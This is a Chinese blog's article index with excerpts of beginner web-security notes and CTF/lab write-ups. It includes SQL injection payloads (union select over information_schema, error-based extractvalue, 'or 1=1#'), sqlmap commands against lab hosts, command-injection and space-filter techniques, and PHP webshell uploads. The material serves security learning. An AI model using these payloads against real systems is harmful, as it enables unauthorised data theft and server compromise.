web
文章平均质量分 60
*小瑶
迷迷糊糊,欢迎指正
展开
-
Linux 基础篇(CentOS)
通过上下左右键来移动光标1、touch text.txt (创建文件text.txt文件)2、vim text.txt(vi/vim为进入vim编辑器命令,意为在vim编辑器中编辑test.txt文件)3、i (i意为insert为输入模式,输入i之后你就可以开始编辑这个txt文件了)4、esc(退出编辑模式)5、:wq (保存并退出(注意:在冒号后面需要加上一个空格,不然linux是不会识别出来的)rm 文件名:带询问删除rm -f 文件名:不带询问删除chmod 000 a.txt原创 2022-07-06 16:52:12 · 4145 阅读 · 2 评论 -
14 WEB漏洞:SQL注入之类型及提交注入
a.数字b.字符c.搜索符4.jsonHTTP头GETPOSTCOOKIEREQUESTJSON注入相关知识$_SERVER(php内置变量,可查询数据包或浏览器信息,可以将查询信息改为sql语句)a. 简介JSON 是存储和交换文本信息的语法,是轻量级的文本数据交换格式。类似xml,但JSON 比 XML 更小、更快,更易解析。所以现在接口数据传输都采用json方式进行。JSON 文本的 MIME 类型是 “application/json”b. JSON语法■ 数据在名称/值对中原创 2022-07-02 12:32:24 · 286 阅读 · 0 评论 -
正则表达式(正则匹配)
正则表达式原创 2022-06-29 14:34:02 · 262 阅读 · 0 评论 -
13 WEB漏洞:SQL注入之MYSQL注入
SQL 是一门 ANSI 的标准计算机语言,用来访问和操作数据库系统-。SQL 语句用于取回和更新数据库中的数据。SQL 可与数据库程序协同工作,比如 MS Access、DB2、Informix、MS SQL Server、Oracle、Sybase 以及其他数据库系统。本来有一些基础知识有在sql注入小总里写,现在还是再提一下:information_schema.tables:记录所有表名信息的表information_schema.columns:记录所有列名信息的表table_name:表名原创 2022-04-29 17:52:35 · 2088 阅读 · 0 评论 -
11-12 WEB漏洞-必懂知识点详解/SQL注入之简要SQL注入
前言:由于信息收集内容比较丰富,包含的知识点比较多,算是很重要的一部分(和实操挂钩),小瑶还没整理好(其实还没太理清,可以收集的信息实在太多,而且收集信息的方法很多简直无法想象)所以先接SQL注入往下写,信息收集等整理好在分享(当然关于信息收集部分,有好的资源可以分享一下哦)<>WEB漏洞:SQL注入:SQL 注入就是在用户输入的字符串中加入 SQL 语句,如果在设计不良的程序中忽略了检查,那么这些注入进去的 SQL 语句就会被数据库服务器误认为是正常的 SQL 语句而运行,攻击原创 2022-03-25 20:37:54 · 331 阅读 · 0 评论 -
SQL注入小总
又是一个被迫作业,一到周末反而忙死!1.SQL注入把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。2.种类很多,但原理和利用方式几乎都差不太多,掌握一种,其他的可能就比较好学了。(种类百度可能比较方便https://www.cnblogs.com/xuthus/p/9450805.html )做题的话我理解就是先拿到他的库名,然后是表名,再是字段明,然后看字段内容。(通俗一点,每一个库里,可能有很多个表,每个表里有很多的字段,每个字段里都原创 2022-03-18 23:41:10 · 615 阅读 · 0 评论 -
07基础入门:CDN相关技术
CDN:是构建在现有网络基础之上的智能虚拟网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度等功能模块,使用户就近获取所需内容,降低网络拥塞,提高用户访问响应速度和命中率判断是否存在CDN:超级ping网址:http://ping.chinaz.com/https://ping.aizhan.com/http://ping.aizhan.com/http://ce.cloud.360.cn/nslookup,若目标存在多个IP的话,就很有可能有CDN服务CDN绕过技原创 2022-03-15 22:25:01 · 843 阅读 · 2 评论 -
06 基础入门:加密算法
学习加密算法原因:在渗透测试中,常见的密码等敏感信息会采用加密处理,其中作为安全测试人员必须要了解常见的加密方式,才能为后续的安全测试做好准备。常见加密算法:MD5,SHA,ASC,进制,时间戳,URL,BASE64,Unescape,AES,DES等1.MD5不可逆(只能通过算法加密,不能通过算法解密。其解密方法是通过枚举法。将大量明文加密后与将要解密的密文对照,从而确定其解密结果。)16位和32位,加密字符由A-Z,0-9随机组成2.SHA不可逆。由A-Z,0-9随机组合,SHA1,S原创 2022-03-14 22:36:59 · 2143 阅读 · 1 评论 -
05基础入门:系统及数据库等
学习原因:除去搭建平台中间件,网站源码外,容易受到攻击的还有操作系统,数据库,第三方软件平台等,其中此类攻击也能直接影响到Web或服务器的安全,导致网站或服务器权限的获取判别操作系统类型:网站路径、大小写、文件在两个系统之间的适用性,兼容性不同判断出操作系统,就可以从不同操作系统所支持的漏洞类型下手。大小写:windows服务器不区分大小写,linux区分大小写。TTL: 不同操作系统的TTL值不同(与那个接近就是哪种操作系统)用IP地址在nmap上判断操作系统命令:nmap -O ip地址原创 2022-03-12 17:23:17 · 1648 阅读 · 0 评论 -
04基础入门:WEB源码拓展
1.WEB源码作用用来代码审计漏洞,做信息突破口。栗子:获取某ASP源码后可以采用默认数据库下载为突破,获取某其他脚本源码漏洞可以进行代码审计挖掘或分析其业务逻辑等,总之源码的获取将为后期的安全测试提供了更多的思路。2.关于WEB源码目录结构据库配置文件,后台目录,模板目录,数据库目录等index.php 根据文件后缀判定admin 网站后台路径data 数据相关目录install 安装目录member 会员目录template 模板目录(和网站相关的整体架构)data =>原创 2022-03-08 15:16:54 · 4900 阅读 · 0 评论 -
03基础入门:搭建安全拓展
1.域名IP目录解析安全问题域名解析访问的是目录,ip访问的是域名解析目录的上级目录,它能扫到更多信息。IP地址访问可以发现更多的信息同时经常能找到程序源码备份文件和敏感信息,而域名访问只能发现一个文件夹下的所有文件。2.文件后缀...原创 2022-03-08 13:18:21 · 338 阅读 · 0 评论 -
02基础入门:数据包拓展
1.HTTP协议是从WEB服务器传输超文本标记语言(HTML)到本地浏览器的传送协议。(最初的目的是为了提供一种发布和接收HTML页面的方法)HTTP是一个基于TCP/IP通信协议来传递数据的协议,传输的数据类型为HTML 文件,、图片文件, 查询结果等。2.HTTP与HTTPS区别:● HTTPS是HTTP协议的安全版本,HTTP协议的数据传输是明文的,是不安全的,HTTPS使用了SSL/TLS协议进行了加密处理。● http和https使用连接方式不同,默认端口也不一样,http是80,ht原创 2022-03-05 20:53:31 · 5671 阅读 · 0 评论 -
01 基础入门:概念名词
1.域名由于IP地址具有不方便记忆并且不能显示地址组织的名称和性质等缺点,便设计出了域名,并通过网域名称系统来将域名和IP地址相互映射,使人更方便地访问互联网,而不用去记住能够被机器直接读取的IP地址数串。域名注册位置1.Godaddy2.Gandi3.Hover4.Namesilo5.Namecheap6.万网顶级域名 二级域名和多级域名:1.顶级域名:又叫一级域名,一串字符串中间一个点隔开,例如baidu.com。顶级域名是互联网DNS等级之中的最高级的域,它保存于DNS根域的名字原创 2022-03-05 16:59:33 · 160 阅读 · 0 评论 -
Cisco 三层交换
三层交换实验拓扑:实验目标:1:理解并配置交换机的SVI2:实现三层交换机的VLAN间通信实验步骤∶1:开启三层交换机的路由功能2:配置SW1 上 VLAN2、VLAN3的SVI,并查看端口状态3:使用SVI地址作为PC的网关4:测试VLAN间通信实验配置:1:SW1的基本配置(二层交换机)配置trunk模式SW1 SW22:开启3层交换机的路由功能并创建vlan及命名3:配SW1的交换虚拟按口SVI4配置PC网关5:测试VLAN间通信(部分)...原创 2022-01-18 19:56:01 · 690 阅读 · 0 评论 -
bugku网站被黑
这题能两个点根据提示(网站被黑了 黑客会不会留下后门)1.首先尝试使用御剑扫描网站的目录![在这里插入图片描述](https://img-blog.csdnimg.cn/bcda5f9a940e4d2cac8a88ab56eb4846.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAKuWwj-eRtg==,size_20,color_FFFFFF,t_70,gindex.phpshell.原创 2022-01-10 14:43:52 · 2340 阅读 · 0 评论 -
SQL注入漏洞测试(登录绕过)
写这篇文章是为了帮大家避雷,咱就是说这题就是来骗币的,友友们别上当(浪费3个币的我好想哭)打开是这样直接使用万能密码即可'or 1=1#原创 2022-01-09 21:05:15 · 4115 阅读 · 0 评论 -
SQL注入漏洞测试(HTTP头注入)
先简单写一下这题的解题步骤,原理在后面在看看提不提吧1.在此页面用bp抓包2.在此修改数据包3.查字段数,4回显正常,5错误 说明是4个字段order by 4order by 54.看回显 union select 1,2,3,4说明回显位在2,3,4,5.查看库名 union select 1,2,3,database()查看表名 union select 1,2,3,group_concat(table_name) from information_schema.tabl原创 2021-12-12 20:06:58 · 2140 阅读 · 0 评论 -
SQL注入漏洞测试(报错盲注)
1.判断注入类型id=1 回显正常id=1’ and 1=1-- - 回显正常id=1’ and 1=2-- - 回显错误因此,判断为单字符注入2.由于题目是报错盲注所以我们可以尝试使用报错型注入的函数尝试爆库名http://219.153.49.228:43578/new_list.php?id=1’ and extractvalue(1,concat(’~’,(select database())))-- -2.ok,接着爆表名http://219.153.49.228:435原创 2021-12-11 16:41:34 · 3112 阅读 · 0 评论 -
SQL注入漏洞测试(delete注入)
*首先关于报错型注入可以参考一下*文章了解delecte注入的多种方法这题我使用的是extractvalue函数从此可以知道注入点在删除页面的url链接的id参数中,可由报错注入来爆库1.爆库 (pikaqiu)http://219.153.49.228:48577/sqli_del.php?id=666 and extractvalue(1,concat(’~’,(select database())))2.爆表名(message)http://219.153.49.228:48577/原创 2021-12-09 21:24:30 · 2789 阅读 · 0 评论 -
X-Forwarded-For注入漏洞实战
解题步骤:1.bp抓包(随便登录用户和密码)2.修改X-Forward-For 鼠标右键保存到桌面(命名为*.txt 列如xff.txt)3.使用sqlmap库名 python sqlmap.py -r C:\Users\86191\Desktop\xff.txt --dbs --batch表名 python sqlmap.py -r C:\Users\86191\Desktop\xff.txt -D webcalendar --tables --batch字段 pytho原创 2021-12-06 19:19:58 · 836 阅读 · 0 评论 -
SQL手工注入漏洞测试(Sql Server数据库)
1.判断注入类型(数字型)2.判断字段数(4个)3.判断回显(2和3) 这里要注意两个点1.使用union all2.字段三的位置是字符4.爆库 (使用db_name()函数查询数据库) mozhe_db_v25.查看表名 xtype=‘u’ :查看用户表mmsql和mysql语法有点不同,mmsql记录敏感信息的表在sysobjects 中具体参数请了解以下链接了解:https://www.cnblogs.com/atree/p/SQL-Server-sysobjects原创 2021-12-02 20:54:05 · 469 阅读 · 0 评论 -
SQL手工注入漏洞测试(Access数据库)
1.判断注入类型 (数字型)2.判断字段数(4个)3.猜表名 (猜对表名是admin,并且发现回显在2和3)其他猜表名的方法?id=1 and 0<>(select count(*) from 表名)?id=1 and exists (select * from 表名)4.猜字段名(在有回显的位置猜,字段为username passwd)其他方法:?id=1 and exists (select 字段名 from admin)5.md5解密一下...原创 2021-12-02 19:18:32 · 553 阅读 · 0 评论 -
SQL注入漏洞测试(布尔盲注)
一.sqlmap1.查看库名(测试后发现有5个)python sqlmap.py -u http://219.153.49.228:44485/new_list.php?id=1 --dbs2.查看表明 python sqlmap.py -u http://219.153.49.228:44485/new_list.php?id=1 -D stormgroup --tables3.查看字段名 python sqlmap.py -u http://219.153.49.228:44485/new_原创 2021-11-30 17:11:29 · 5260 阅读 · 0 评论 -
SQL手工注入漏洞测试(MySQL数据库-字符型)
测试后发现是字符型 4个字段,回显是2和3 ?id=’ union select 1,2,3,4 – -2. 查看库名 ?id=’ union select 1,database(),version(),4 – - mozhe_discuz_stormgroup3.查看表名,测试后发现有两个 notice和stormgroup_member?id=’ union select 1,table_name,version(),4 from information_schema.tables.原创 2021-11-28 20:57:02 · 4781 阅读 · 0 评论 -
《从0到1:CTFer成长之路》题目 SQL注入-1
一.SQLMap![在这里插入图片描述](https://img-blog.csdnimg.cn/2e18372d86f740ba91ce8e5ba09b1f3b.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAKuWwj-eRtg==,size_20,color_FFFFFF,t_70,g_se,x_164个库2个表一个字段二:手注3个字段,联合注入,回显位在2和3查原创 2021-11-27 19:58:56 · 3009 阅读 · 0 评论 -
SQL手工注入漏洞测试(MySQL数据库)
1. order by 查字段 字段至少为四2. union select 1,2,3,4 (回显位在2和3)3.查库和版本号 database() version()http://219.153.49.228:44777/new_list.php?id=1%20and%200%20%20%20union%20select%201,database(),version(),4 库名:mozhe_Discuz_StormGroup4.查表名 219.153.49.228:44777/原创 2021-11-27 17:02:29 · 2783 阅读 · 0 评论 -
[极客大挑战 2019]BuyFlag
首先题目打开是这样,我们先尝试抓包原创 2021-10-25 21:13:31 · 69 阅读 · 0 评论 -
Bugku 本地管理员
首先打开f12看一下源码,可以看到一串base64加密后的字符,解密看一下原创 2021-10-24 21:27:28 · 133 阅读 · 0 评论 -
Bugku Flask_FileUpload
这道题还是比较好理解的,先f12查看源码,然后源码的大概意思是只能上传png和jpg文件,并且会用python来执行文件。然后用记事本写就欧克,引入import os ,调用cat flag。然后上传文件,在f12就可以看到flag...原创 2021-10-24 20:43:30 · 1064 阅读 · 0 评论 -
Bugku 文件包含
这题提示了是文件包含,利用php为协议读取文件就好,然后百度一下(推荐这个文),然后选用这个http://127.0.0.1/cmd.php?cmd=php://filter/read=convert.base64-encode/resource=[文件名](针对php文件需要base64编码)然后拿到base64一下ok了...原创 2021-10-23 17:55:50 · 101 阅读 · 0 评论 -
Bugku Simple_SSTI_2
首先打开之后是上面这样,题目有提示是ssti,所以原创 2021-10-23 17:42:14 · 2463 阅读 · 1 评论 -
[BJDCTF2020]Easy MD5
距离上次写wp还是四个月之前,这题打开之后是这样的。我先尝试了sql注入,放 ’ / "什么的都没什么反应,所以试试抓包这是主要代码 select * from ‘admin’ where password=md5($pass,true)这里写了一个md5( ) 函数我们可以看到,我们的raw位置写的是true,由md5()函数可知,此代码会返回16字符的二进制...原创 2021-10-17 21:55:39 · 75 阅读 · 0 评论 -
Buuctf [ACTF2020 新生赛]Upload
先说本题考点吧:php别名绕过打开是一个灯泡,要我们上传一个文件(文件上传)发现有上传要求我们可以在前端的html中将下图我标记的白色部分删除即可没有要求然后我们开始可以试着上传一个php文件,发现上传php文件会被拦截。这种时候我们可以用burpsuite fuzz一下(不会的在文章最后会给大佬的教程) fuzz后发现phtml类型的文件可以上传文件里我们写一句话木马,和cat flag上传成功后即可看到然后我们url/uplo4d/881d111ef425270b34a18ab8c5762原创 2021-06-10 20:29:15 · 398 阅读 · 2 评论 -
Buuctf [GXYCTF2019]Ping Ping Ping
打开之后是一个ping的命令,我们可以先尝试着试一下ping命令发现确实是有回显的,我们可以先查看一下目录,ls一下发现有两文件,有一个flag.php然后我们可以尝试一下cat flag.php尝试之后发现是过滤了空格,准备用/* */绕过空格,然后就。。。发现又被过滤了然后我准备换一个绕过空格%09 然后又发现被过滤了,不过这次是flag被过滤了既然遇到了空格过滤,那小瑶就稍稍总结一下绕过空格${IFS}替换$IFS$1替换${IFS替换%20替换<和<>重原创 2021-06-07 21:18:38 · 145 阅读 · 3 评论 -
Buuctf[ACTF2020 新生赛]Exec
打开看到的就是这样的一个页面,ping命令是用于检查网络联通状况的计算机命令。我们可以先尝试着输入一个网址127.0.0.1 然后就得到了这个界面发现它确实执行了ping的命令,推测可能存在命令执行漏洞(命令执行漏洞是指服务器没有对执行的命令进行过滤,用户可以随意执行系统命令,命令执行漏洞属于高危漏洞之一)我们可以试着cat /flag试试然后就得到了flag这题考点其实是考常见管道符(看一下别人总结的)|(按位或),直接执行|后面的语句||(逻辑或),如果前面命令是错的那么就执行后面的.原创 2021-06-05 20:13:29 · 191 阅读 · 0 评论